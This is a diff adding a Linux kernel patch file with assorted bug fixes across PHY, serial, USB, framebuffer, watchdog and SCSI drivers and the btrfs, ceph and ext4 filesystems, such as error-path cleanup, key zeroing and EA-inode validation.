+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+index 816829105135e..8c527c4927fd1 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-combo.c
+@@ -1993,7 +1993,7 @@ static int qmp_combo_com_init(struct qmp_phy *qphy)
+ 	ret = regulator_bulk_enable(cfg->num_vregs, qmp->vregs);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "failed to enable regulators, err=%d\n", ret);
+-		goto err_unlock;
++		goto err_decrement_count;
+ 	}
+ 
+ 	ret = reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+@@ -2048,7 +2048,8 @@ err_assert_reset:
+ 	reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+ err_disable_regulators:
+ 	regulator_bulk_disable(cfg->num_vregs, qmp->vregs);
+-err_unlock:
++err_decrement_count:
++	qmp->init_count--;
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+ 	return ret;
+diff --git a/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c b/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
+index 461f0b5d464a8..31c223a54394a 100644
+--- a/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
++++ b/drivers/phy/qualcomm/phy-qcom-qmp-pcie-msm8996.c
+@@ -425,7 +425,7 @@ static int qmp_pcie_msm8996_com_init(struct qmp_phy *qphy)
+ 	ret = regulator_bulk_enable(cfg->num_vregs, qmp->vregs);
+ 	if (ret) {
+ 		dev_err(qmp->dev, "failed to enable regulators, err=%d\n", ret);
+-		goto err_unlock;
++		goto err_decrement_count;
+ 	}
+ 
+ 	ret = reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+@@ -455,7 +455,8 @@ err_assert_reset:
+ 	reset_control_bulk_assert(cfg->num_resets, qmp->resets);
+ err_disable_regulators:
+ 	regulator_bulk_disable(cfg->num_vregs, qmp->vregs);
+-err_unlock:
++err_decrement_count:
++	qmp->init_count--;
+ 	mutex_unlock(&qmp->phy_mutex);
+ 
+ 	return ret;
+diff --git a/drivers/platform/mellanox/mlxbf-tmfifo.c b/drivers/platform/mellanox/mlxbf-tmfifo.c
+index 1ae3c56b66b09..b2e19f30a928b 100644
+--- a/drivers/platform/mellanox/mlxbf-tmfifo.c
++++ b/drivers/platform/mellanox/mlxbf-tmfifo.c
+@@ -765,7 +765,7 @@ static void mlxbf_tmfifo_rxtx(struct mlxbf_tmfifo_vring *vring, bool is_rx)
+ 	fifo = vring->fifo;
+ 
+ 	/* Return if vdev is not ready. */
+-	if (!fifo->vdev[devid])
++	if (!fifo || !fifo->vdev[devid])
+ 		return;
+ 
+ 	/* Return if another vring is running. */
+@@ -961,9 +961,13 @@ static int mlxbf_tmfifo_virtio_find_vqs(struct virtio_device *vdev,
+ 
+ 		vq->num_max = vring->num;
+ 
++		vq->priv = vring;
++
++		/* Make vq update visible before using it. */
++		virtio_mb(false);
++
+ 		vqs[i] = vq;
+ 		vring->vq = vq;
+-		vq->priv = vring;
+ 	}
+ 
+ 	return 0;
+@@ -1260,6 +1264,9 @@ static int mlxbf_tmfifo_probe(struct platform_device *pdev)
+ 
+ 	mod_timer(&fifo->timer, jiffies + MLXBF_TMFIFO_TIMER_INTERVAL);
+ 
++	/* Make all updates visible before setting the 'is_ready' flag. */
++	virtio_mb(false);
++
+ 	fifo->is_ready = true;
+ 	return 0;
+ 
+diff --git a/drivers/platform/x86/intel_scu_pcidrv.c b/drivers/platform/x86/intel_scu_pcidrv.c
+index 80abc708e4f2f..d904fad499aa5 100644
+--- a/drivers/platform/x86/intel_scu_pcidrv.c
++++ b/drivers/platform/x86/intel_scu_pcidrv.c
+@@ -34,6 +34,7 @@ static int intel_scu_pci_probe(struct pci_dev *pdev,
+ 
+ static const struct pci_device_id pci_ids[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x080e) },
++	{ PCI_VDEVICE(INTEL, 0x082a) },
+ 	{ PCI_VDEVICE(INTEL, 0x08ea) },
+ 	{ PCI_VDEVICE(INTEL, 0x0a94) },
+ 	{ PCI_VDEVICE(INTEL, 0x11a0) },
+diff --git a/drivers/s390/crypto/pkey_api.c b/drivers/s390/crypto/pkey_api.c
+index 5a05d1cdfec20..a8def50c149bd 100644
+--- a/drivers/s390/crypto/pkey_api.c
++++ b/drivers/s390/crypto/pkey_api.c
+@@ -1293,6 +1293,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 			return PTR_ERR(kkey);
+ 		rc = pkey_keyblob2pkey(kkey, ktp.keylen, &ktp.protkey);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey()=%d\n", __func__, rc);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc)
+ 			break;
+@@ -1426,6 +1427,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 					kkey, ktp.keylen, &ktp.protkey);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey2()=%d\n", __func__, rc);
+ 		kfree(apqns);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc)
+ 			break;
+@@ -1552,6 +1554,7 @@ static long pkey_unlocked_ioctl(struct file *filp, unsigned int cmd,
+ 					protkey, &protkeylen);
+ 		DEBUG_DBG("%s pkey_keyblob2pkey3()=%d\n", __func__, rc);
+ 		kfree(apqns);
++		memzero_explicit(kkey, ktp.keylen);
+ 		kfree(kkey);
+ 		if (rc) {
+ 			kfree(protkey);
+diff --git a/drivers/scsi/scsi_lib.c b/drivers/scsi/scsi_lib.c
+index 8b89fab7c4206..fb6e9a7a7f58b 100644
+--- a/drivers/scsi/scsi_lib.c
++++ b/drivers/scsi/scsi_lib.c
+@@ -1491,6 +1491,7 @@ static int scsi_dispatch_cmd(struct scsi_cmnd *cmd)
+ 		 */
+ 		SCSI_LOG_MLQUEUE(3, scmd_printk(KERN_INFO, cmd,
+ 			"queuecommand : device blocked\n"));
++		atomic_dec(&cmd->device->iorequest_cnt);
+ 		return SCSI_MLQUEUE_DEVICE_BUSY;
+ 	}
+ 
+@@ -1523,6 +1524,7 @@ static int scsi_dispatch_cmd(struct scsi_cmnd *cmd)
+ 	trace_scsi_dispatch_cmd_start(cmd);
+ 	rtn = host->hostt->queuecommand(host, cmd);
+ 	if (rtn) {
++		atomic_dec(&cmd->device->iorequest_cnt);
+ 		trace_scsi_dispatch_cmd_error(cmd, rtn);
+ 		if (rtn != SCSI_MLQUEUE_DEVICE_BUSY &&
+ 		    rtn != SCSI_MLQUEUE_TARGET_BUSY)
+diff --git a/drivers/scsi/stex.c b/drivers/scsi/stex.c
+index 8def242675ef3..6b07f367918ef 100644
+--- a/drivers/scsi/stex.c
++++ b/drivers/scsi/stex.c
+@@ -109,7 +109,9 @@ enum {
+ 	TASK_ATTRIBUTE_HEADOFQUEUE		= 0x1,
+ 	TASK_ATTRIBUTE_ORDERED			= 0x2,
+ 	TASK_ATTRIBUTE_ACA			= 0x4,
++};
+ 
++enum {
+ 	SS_STS_NORMAL				= 0x80000000,
+ 	SS_STS_DONE				= 0x40000000,
+ 	SS_STS_HANDSHAKE			= 0x20000000,
+@@ -121,7 +123,9 @@ enum {
+ 	SS_I2H_REQUEST_RESET			= 0x2000,
+ 
+ 	SS_MU_OPERATIONAL			= 0x80000000,
++};
+ 
++enum {
+ 	STEX_CDB_LENGTH				= 16,
+ 	STATUS_VAR_LEN				= 128,
+ 
+diff --git a/drivers/tty/serial/8250/8250_tegra.c b/drivers/tty/serial/8250/8250_tegra.c
+index e7cddeec9d8e0..c424e2ae0e8fe 100644
+--- a/drivers/tty/serial/8250/8250_tegra.c
++++ b/drivers/tty/serial/8250/8250_tegra.c
+@@ -112,13 +112,15 @@ static int tegra_uart_probe(struct platform_device *pdev)
+ 
+ 	ret = serial8250_register_8250_port(&port8250);
+ 	if (ret < 0)
+-		goto err_clkdisable;
++		goto err_ctrl_assert;
+ 
+ 	platform_set_drvdata(pdev, uart);
+ 	uart->line = ret;
+ 
+ 	return 0;
+ 
++err_ctrl_assert:
++	reset_control_assert(uart->rst);
+ err_clkdisable:
+ 	clk_disable_unprepare(uart->clk);
+ 
+diff --git a/drivers/tty/serial/Kconfig b/drivers/tty/serial/Kconfig
+index 4fce15296f311..12f685168aef9 100644
+--- a/drivers/tty/serial/Kconfig
++++ b/drivers/tty/serial/Kconfig
+@@ -769,7 +769,7 @@ config SERIAL_PMACZILOG_CONSOLE
+ 
+ config SERIAL_CPM
+ 	tristate "CPM SCC/SMC serial port support"
+-	depends on CPM2 || CPM1 || (PPC32 && COMPILE_TEST)
++	depends on CPM2 || CPM1
+ 	select SERIAL_CORE
+ 	help
+ 	  This driver supports the SCC and SMC serial ports on Motorola 
+diff --git a/drivers/tty/serial/cpm_uart/cpm_uart.h b/drivers/tty/serial/cpm_uart/cpm_uart.h
+index 0577618e78c04..46c03ed71c31b 100644
+--- a/drivers/tty/serial/cpm_uart/cpm_uart.h
++++ b/drivers/tty/serial/cpm_uart/cpm_uart.h
+@@ -19,8 +19,6 @@ struct gpio_desc;
+ #include "cpm_uart_cpm2.h"
+ #elif defined(CONFIG_CPM1)
+ #include "cpm_uart_cpm1.h"
+-#elif defined(CONFIG_COMPILE_TEST)
+-#include "cpm_uart_cpm2.h"
+ #endif
+ 
+ #define SERIAL_CPM_MAJOR	204
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 81467e93c7d53..dc7ac1ddbca5e 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1475,34 +1475,36 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp, modem;
+-	struct tty_struct *tty;
+-	unsigned int cflag = 0;
+-
+-	tty = tty_port_tty_get(&port->state->port);
+-	if (tty) {
+-		cflag = tty->termios.c_cflag;
+-		tty_kref_put(tty);
+-	}
++	unsigned long temp;
+ 
+-	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
+-	modem = lpuart32_read(port, UARTMODIR);
++	temp = lpuart32_read(port, UARTCTRL);
+ 
++	/*
++	 * LPUART IP now has two known bugs, one is CTS has higher priority than the
++	 * break signal, which causes the break signal sending through UARTCTRL_SBK
++	 * may impacted by the CTS input if the HW flow control is enabled. It
++	 * exists on all platforms we support in this driver.
++	 * Another bug is i.MX8QM LPUART may have an additional break character
++	 * being sent after SBK was cleared.
++	 * To avoid above two bugs, we use Transmit Data Inversion function to send
++	 * the break signal instead of UARTCTRL_SBK.
++	 */
+ 	if (break_state != 0) {
+-		temp |= UARTCTRL_SBK;
+ 		/*
+-		 * LPUART CTS has higher priority than SBK, need to disable CTS before
+-		 * asserting SBK to avoid any interference if flow control is enabled.
++		 * Disable the transmitter to prevent any data from being sent out
++		 * during break, then invert the TX line to send break.
+ 		 */
+-		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
+-			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++		temp &= ~UARTCTRL_TE;
++		lpuart32_write(port, temp, UARTCTRL);
++		temp |= UARTCTRL_TXINV;
++		lpuart32_write(port, temp, UARTCTRL);
+ 	} else {
+-		/* Re-enable the CTS when break off. */
+-		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
+-			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++		/* Disable the TXINV to turn off break and re-enable transmitter. */
++		temp &= ~UARTCTRL_TXINV;
++		lpuart32_write(port, temp, UARTCTRL);
++		temp |= UARTCTRL_TE;
++		lpuart32_write(port, temp, UARTCTRL);
+ 	}
+-
+-	lpuart32_write(port, temp, UARTCTRL);
+ }
+ 
+ static void lpuart_setup_watermark(struct lpuart_port *sport)
+diff --git a/drivers/usb/cdns3/cdns3-gadget.c b/drivers/usb/cdns3/cdns3-gadget.c
+index ccfaebca6faa7..1dcadef933e3a 100644
+--- a/drivers/usb/cdns3/cdns3-gadget.c
++++ b/drivers/usb/cdns3/cdns3-gadget.c
+@@ -2097,6 +2097,19 @@ int cdns3_ep_config(struct cdns3_endpoint *priv_ep, bool enable)
+ 	else
+ 		priv_ep->trb_burst_size = 16;
+ 
++	/*
++	 * In versions preceding DEV_VER_V2, for example, iMX8QM, there exit the bugs
++	 * in the DMA. These bugs occur when the trb_burst_size exceeds 16 and the
++	 * address is not aligned to 128 Bytes (which is a product of the 64-bit AXI
++	 * and AXI maximum burst length of 16 or 0xF+1, dma_axi_ctrl0[3:0]). This
++	 * results in data corruption when it crosses the 4K border. The corruption
++	 * specifically occurs from the position (4K - (address & 0x7F)) to 4K.
++	 *
++	 * So force trb_burst_size to 16 at such platform.
++	 */
++	if (priv_dev->dev_ver < DEV_VER_V2)
++		priv_ep->trb_burst_size = 16;
++
+ 	mult = min_t(u8, mult, EP_CFG_MULT_MAX);
+ 	buffering = min_t(u8, buffering, EP_CFG_BUFFERING_MAX);
+ 	maxburst = min_t(u8, maxburst, EP_CFG_MAXBURST_MAX);
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 8ad354741380d..3e59055aa5040 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -3620,6 +3620,7 @@ static void ffs_func_unbind(struct usb_configuration *c,
+ 	/* Drain any pending AIO completions */
+ 	drain_workqueue(ffs->io_completion_wq);
+ 
++	ffs_event_add(ffs, FUNCTIONFS_UNBIND);
+ 	if (!--opts->refcnt)
+ 		functionfs_unbind(ffs);
+ 
+@@ -3644,7 +3645,6 @@ static void ffs_func_unbind(struct usb_configuration *c,
+ 	func->function.ssp_descriptors = NULL;
+ 	func->interfaces_nums = NULL;
+ 
+-	ffs_event_add(ffs, FUNCTIONFS_UNBIND);
+ }
+ 
+ static struct usb_function *ffs_alloc(struct usb_function_instance *fi)
+diff --git a/drivers/video/fbdev/core/bitblit.c b/drivers/video/fbdev/core/bitblit.c
+index f98e8f298bc19..8587c9da06700 100644
+--- a/drivers/video/fbdev/core/bitblit.c
++++ b/drivers/video/fbdev/core/bitblit.c
+@@ -247,6 +247,9 @@ static void bit_cursor(struct vc_data *vc, struct fb_info *info, int mode,
+ 
+ 	cursor.set = 0;
+ 
++	if (!vc->vc_font.data)
++		return;
++
+  	c = scr_readw((u16 *) vc->vc_pos);
+ 	attribute = get_attribute(info, c);
+ 	src = vc->vc_font.data + ((c & charmask) * (w * vc->vc_font.height));
+diff --git a/drivers/video/fbdev/core/modedb.c b/drivers/video/fbdev/core/modedb.c
+index 6473e0dfe1464..e78ec7f728463 100644
+--- a/drivers/video/fbdev/core/modedb.c
++++ b/drivers/video/fbdev/core/modedb.c
+@@ -257,6 +257,11 @@ static const struct fb_videomode modedb[] = {
+ 	{ NULL, 72, 480, 300, 33386, 40, 24, 11, 19, 80, 3, 0,
+ 		FB_VMODE_DOUBLE },
+ 
++	/* 1920x1080 @ 60 Hz, 67.3 kHz hsync */
++	{ NULL, 60, 1920, 1080, 6734, 148, 88, 36, 4, 44, 5, 0,
++		FB_SYNC_HOR_HIGH_ACT | FB_SYNC_VERT_HIGH_ACT,
++		FB_VMODE_NONINTERLACED },
++
+ 	/* 1920x1200 @ 60 Hz, 74.5 Khz hsync */
+ 	{ NULL, 60, 1920, 1200, 5177, 128, 336, 1, 38, 208, 3,
+ 		FB_SYNC_HOR_HIGH_ACT | FB_SYNC_VERT_HIGH_ACT,
+diff --git a/drivers/video/fbdev/imsttfb.c b/drivers/video/fbdev/imsttfb.c
+index d7edb9c5d3a3f..e6adb2890ecfe 100644
+--- a/drivers/video/fbdev/imsttfb.c
++++ b/drivers/video/fbdev/imsttfb.c
+@@ -1347,7 +1347,7 @@ static const struct fb_ops imsttfb_ops = {
+ 	.fb_ioctl 	= imsttfb_ioctl,
+ };
+ 
+-static void init_imstt(struct fb_info *info)
++static int init_imstt(struct fb_info *info)
+ {
+ 	struct imstt_par *par = info->par;
+ 	__u32 i, tmp, *ip, *end;
+@@ -1420,7 +1420,7 @@ static void init_imstt(struct fb_info *info)
+ 	    || !(compute_imstt_regvals(par, info->var.xres, info->var.yres))) {
+ 		printk("imsttfb: %ux%ux%u not supported\n", info->var.xres, info->var.yres, info->var.bits_per_pixel);
+ 		framebuffer_release(info);
+-		return;
++		return -ENODEV;
+ 	}
+ 
+ 	sprintf(info->fix.id, "IMS TT (%s)", par->ramdac == IBM ? "IBM" : "TVP");
+@@ -1456,12 +1456,13 @@ static void init_imstt(struct fb_info *info)
+ 
+ 	if (register_framebuffer(info) < 0) {
+ 		framebuffer_release(info);
+-		return;
++		return -ENODEV;
+ 	}
+ 
+ 	tmp = (read_reg_le32(par->dc_regs, SSTATUS) & 0x0f00) >> 8;
+ 	fb_info(info, "%s frame buffer; %uMB vram; chip version %u\n",
+ 		info->fix.id, info->fix.smem_len >> 20, tmp);
++	return 0;
+ }
+ 
+ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+@@ -1529,10 +1530,10 @@ static int imsttfb_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (!par->cmap_regs)
+ 		goto error;
+ 	info->pseudo_palette = par->palette;
+-	init_imstt(info);
+-
+-	pci_set_drvdata(pdev, info);
+-	return 0;
++	ret = init_imstt(info);
++	if (!ret)
++		pci_set_drvdata(pdev, info);
++	return ret;
+ 
+ error:
+ 	if (par->dc_regs)
+diff --git a/drivers/video/fbdev/stifb.c b/drivers/video/fbdev/stifb.c
+index ef8a4c5fc6875..63f51783352dc 100644
+--- a/drivers/video/fbdev/stifb.c
++++ b/drivers/video/fbdev/stifb.c
+@@ -1413,6 +1413,7 @@ out_err1:
+ 	iounmap(info->screen_base);
+ out_err0:
+ 	kfree(fb);
++	sti->info = NULL;
+ 	return -ENXIO;
+ }
+ 
+diff --git a/drivers/watchdog/menz69_wdt.c b/drivers/watchdog/menz69_wdt.c
+index 8973f98bc6a56..bca0938f3429f 100644
+--- a/drivers/watchdog/menz69_wdt.c
++++ b/drivers/watchdog/menz69_wdt.c
+@@ -98,14 +98,6 @@ static const struct watchdog_ops men_z069_ops = {
+ 	.set_timeout = men_z069_wdt_set_timeout,
+ };
+ 
+-static struct watchdog_device men_z069_wdt = {
+-	.info = &men_z069_info,
+-	.ops = &men_z069_ops,
+-	.timeout = MEN_Z069_DEFAULT_TIMEOUT,
+-	.min_timeout = 1,
+-	.max_timeout = MEN_Z069_WDT_COUNTER_MAX / MEN_Z069_TIMER_FREQ,
+-};
+-
+ static int men_z069_probe(struct mcb_device *dev,
+ 			  const struct mcb_device_id *id)
+ {
+@@ -125,15 +117,19 @@ static int men_z069_probe(struct mcb_device *dev,
+ 		goto release_mem;
+ 
+ 	drv->mem = mem;
++	drv->wdt.info = &men_z069_info;
++	drv->wdt.ops = &men_z069_ops;
++	drv->wdt.timeout = MEN_Z069_DEFAULT_TIMEOUT;
++	drv->wdt.min_timeout = 1;
++	drv->wdt.max_timeout = MEN_Z069_WDT_COUNTER_MAX / MEN_Z069_TIMER_FREQ;
+ 
+-	drv->wdt = men_z069_wdt;
+ 	watchdog_init_timeout(&drv->wdt, 0, &dev->dev);
+ 	watchdog_set_nowayout(&drv->wdt, nowayout);
+ 	watchdog_set_drvdata(&drv->wdt, drv);
+ 	drv->wdt.parent = &dev->dev;
+ 	mcb_set_drvdata(dev, drv);
+ 
+-	return watchdog_register_device(&men_z069_wdt);
++	return watchdog_register_device(&drv->wdt);
+ 
+ release_mem:
+ 	mcb_release_mem(mem);
+diff --git a/fs/btrfs/ctree.c b/fs/btrfs/ctree.c
+index dbbae92ac23d8..ab9f8d6c4f1b9 100644
+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -3118,6 +3118,7 @@ static int push_leaf_right(struct btrfs_trans_handle *trans, struct btrfs_root
+ 
+ 	if (check_sibling_keys(left, right)) {
+ 		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
+ 		btrfs_tree_unlock(right);
+ 		free_extent_buffer(right);
+ 		return ret;
+@@ -3348,6 +3349,7 @@ static int push_leaf_left(struct btrfs_trans_handle *trans, struct btrfs_root
+ 
+ 	if (check_sibling_keys(left, right)) {
+ 		ret = -EUCLEAN;
++		btrfs_abort_transaction(trans, ret);
+ 		goto out;
+ 	}
+ 	return __push_leaf_left(path, min_data_size,
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 21d8a895e9adb..ca69a46f10065 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -104,7 +104,7 @@ static void csum_tree_block(struct extent_buffer *buf, u8 *result)
+ 	crypto_shash_update(shash, kaddr + BTRFS_CSUM_SIZE,
+ 			    first_page_part - BTRFS_CSUM_SIZE);
+ 
+-	for (i = 1; i < num_pages; i++) {
++	for (i = 1; i < num_pages && INLINE_EXTENT_BUFFER_PAGES > 1; i++) {
+ 		kaddr = page_address(buf->pages[i]);
+ 		crypto_shash_update(shash, kaddr, PAGE_SIZE);
+ 	}
+diff --git a/fs/ceph/mds_client.c b/fs/ceph/mds_client.c
+index 54e3c2ab21d22..1989c8deea55a 100644
+--- a/fs/ceph/mds_client.c
++++ b/fs/ceph/mds_client.c
+@@ -3938,7 +3938,7 @@ static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ 	struct dentry *dentry;
+ 	struct ceph_cap *cap;
+ 	char *path;
+-	int pathlen = 0, err = 0;
++	int pathlen = 0, err;
+ 	u64 pathbase;
+ 	u64 snap_follows;
+ 
+@@ -3961,6 +3961,7 @@ static int reconnect_caps_cb(struct inode *inode, int mds, void *arg)
+ 	cap = __get_cap_for_mds(ci, mds);
+ 	if (!cap) {
+ 		spin_unlock(&ci->i_ceph_lock);
++		err = 0;
+ 		goto out_err;
+ 	}
+ 	dout(" adding %p ino %llx.%llx cap %p %lld %s\n",
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 2156d2a1a7700..0ea3960cb83ee 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1007,11 +1007,13 @@ do {									       \
+  *			  where the second inode has larger inode number
+  *			  than the first
+  *  I_DATA_SEM_QUOTA  - Used for quota inodes only
++ *  I_DATA_SEM_EA     - Used for ea_inodes only
+  */
+ enum {
+ 	I_DATA_SEM_NORMAL = 0,
+ 	I_DATA_SEM_OTHER,
+ 	I_DATA_SEM_QUOTA,
++	I_DATA_SEM_EA
+ };
+ 
+ 
+@@ -2968,7 +2970,8 @@ typedef enum {
+ 	EXT4_IGET_NORMAL =	0,
+ 	EXT4_IGET_SPECIAL =	0x0001, /* OK to iget a system inode */
+ 	EXT4_IGET_HANDLE = 	0x0002,	/* Inode # is from a handle */
+-	EXT4_IGET_BAD =		0x0004  /* Allow to iget a bad inode */
++	EXT4_IGET_BAD =		0x0004, /* Allow to iget a bad inode */
++	EXT4_IGET_EA_INODE =	0x0008	/* Inode should contain an EA value */
+ } ext4_iget_flags;
+ 
+ extern struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+diff --git a/fs/ext4/inode.c b/fs/ext4/inode.c
+index ffc810436ef21..80d5a859ab148 100644
+--- a/fs/ext4/inode.c
++++ b/fs/ext4/inode.c
+@@ -4763,6 +4763,24 @@ static inline void ext4_inode_set_iversion_queried(struct inode *inode, u64 val)
+ 		inode_set_iversion_queried(inode, val);
+ }
+ 
++static const char *check_igot_inode(struct inode *inode, ext4_iget_flags flags)
++
++{
++	if (flags & EXT4_IGET_EA_INODE) {
++		if (!(EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL))
++			return "missing EA_INODE flag";
++		if (ext4_test_inode_state(inode, EXT4_STATE_XATTR) ||
++		    EXT4_I(inode)->i_file_acl)
++			return "ea_inode with extended attributes";
++	} else {
++		if ((EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL))
++			return "unexpected EA_INODE flag";
++	}
++	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD))
++		return "unexpected bad inode w/o EXT4_IGET_BAD";
++	return NULL;
++}
++
+ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 			  ext4_iget_flags flags, const char *function,
+ 			  unsigned int line)
+@@ -4772,6 +4790,7 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	struct ext4_inode_info *ei;
+ 	struct ext4_super_block *es = EXT4_SB(sb)->s_es;
+ 	struct inode *inode;
++	const char *err_str;
+ 	journal_t *journal = EXT4_SB(sb)->s_journal;
+ 	long ret;
+ 	loff_t size;
+@@ -4799,8 +4818,14 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	inode = iget_locked(sb, ino);
+ 	if (!inode)
+ 		return ERR_PTR(-ENOMEM);
+-	if (!(inode->i_state & I_NEW))
++	if (!(inode->i_state & I_NEW)) {
++		if ((err_str = check_igot_inode(inode, flags)) != NULL) {
++			ext4_error_inode(inode, function, line, 0, err_str);
++			iput(inode);
++			return ERR_PTR(-EFSCORRUPTED);
++		}
+ 		return inode;
++	}
+ 
+ 	ei = EXT4_I(inode);
+ 	iloc.bh = NULL;
+@@ -5066,10 +5091,9 @@ struct inode *__ext4_iget(struct super_block *sb, unsigned long ino,
+ 	if (IS_CASEFOLDED(inode) && !ext4_has_feature_casefold(inode->i_sb))
+ 		ext4_error_inode(inode, function, line, 0,
+ 				 "casefold flag without casefold feature");
+-	if (is_bad_inode(inode) && !(flags & EXT4_IGET_BAD)) {
+-		ext4_error_inode(inode, function, line, 0,
+-				 "bad inode without EXT4_IGET_BAD flag");
+-		ret = -EUCLEAN;
++	if ((err_str = check_igot_inode(inode, flags)) != NULL) {
++		ext4_error_inode(inode, function, line, 0, err_str);
++		ret = -EFSCORRUPTED;
+ 		goto bad_inode;
+ 	}
+ 
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index bd2e803d653f7..5db1060b8684f 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -6541,18 +6541,6 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 		}
+ 	}
+ 
+-	/*
+-	 * Reinitialize lazy itable initialization thread based on
+-	 * current settings
+-	 */
+-	if (sb_rdonly(sb) || !test_opt(sb, INIT_INODE_TABLE))
+-		ext4_unregister_li_request(sb);
+-	else {
+-		ext4_group_t first_not_zeroed;
+-		first_not_zeroed = ext4_has_uninit_itable(sb);
+-		ext4_register_li_request(sb, first_not_zeroed);
+-	}
+-
+ 	/*
+ 	 * Handle creation of system zone data early because it can fail.
+ 	 * Releasing of existing data is done when we are sure remount will
+@@ -6590,6 +6578,18 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (enable_rw)
+ 		sb->s_flags &= ~SB_RDONLY;
+ 
++	/*
++	 * Reinitialize lazy itable initialization thread based on
++	 * current settings
++	 */
++	if (sb_rdonly(sb) || !test_opt(sb, INIT_INODE_TABLE))
++		ext4_unregister_li_request(sb);
++	else {
++		ext4_group_t first_not_zeroed;
++		first_not_zeroed = ext4_has_uninit_itable(sb);
++		ext4_register_li_request(sb, first_not_zeroed);
++	}
++
+ 	if (!ext4_has_feature_mmp(sb) || sb_rdonly(sb))
+ 		ext4_stop_mmpd(sbi);
+ 
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index b1b8fe86ccdbd..fddde5045d0c8 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -123,7 +123,11 @@ ext4_expand_inode_array(struct ext4_xattr_inode_array **ea_inode_array,
+ #ifdef CONFIG_LOCKDEP
+ void ext4_xattr_inode_set_class(struct inode *ea_inode)
+ {
++	struct ext4_inode_info *ei = EXT4_I(ea_inode);
++
+ 	lockdep_set_subclass(&ea_inode->i_rwsem, 1);
++	(void) ei;	/* shut up clang warning if !CONFIG_LOCKDEP */
++	lockdep_set_subclass(&ei->i_data_sem, I_DATA_SEM_EA);
+ }
+ #endif
+ 
+@@ -397,7 +401,7 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 		return -EFSCORRUPTED;
+ 	}
+ 
+-	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_NORMAL);
++	inode = ext4_iget(parent->i_sb, ea_ino, EXT4_IGET_EA_INODE);
+ 	if (IS_ERR(inode)) {
+ 		err = PTR_ERR(inode);
+ 		ext4_error(parent->i_sb,
+@@ -405,23 +409,6 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 			   err);
+ 		return err;
+ 	}
+-
+-	if (is_bad_inode(inode)) {
+-		ext4_error(parent->i_sb,
+-			   "error while reading EA inode %lu is_bad_inode",
+-			   ea_ino);
+-		err = -EIO;
+-		goto error;
+-	}
+-
+-	if (!(EXT4_I(inode)->i_flags & EXT4_EA_INODE_FL)) {
+-		ext4_error(parent->i_sb,
+-			   "EA inode %lu does not have EXT4_EA_INODE_FL flag",
+-			    ea_ino);
+-		err = -EINVAL;
+-		goto error;
+-	}
+-
+ 	ext4_xattr_inode_set_class(inode);
+ 
+ 	/*
+@@ -442,9 +429,6 @@ static int ext4_xattr_inode_iget(struct inode *parent, unsigned long ea_ino,
+ 
+ 	*ea_inode = inode;
+ 	return 0;
+-error:
+-	iput(inode);
+-	return err;
+ }
+ 
+ /* Remove entry from mbcache when EA inode is getting evicted */
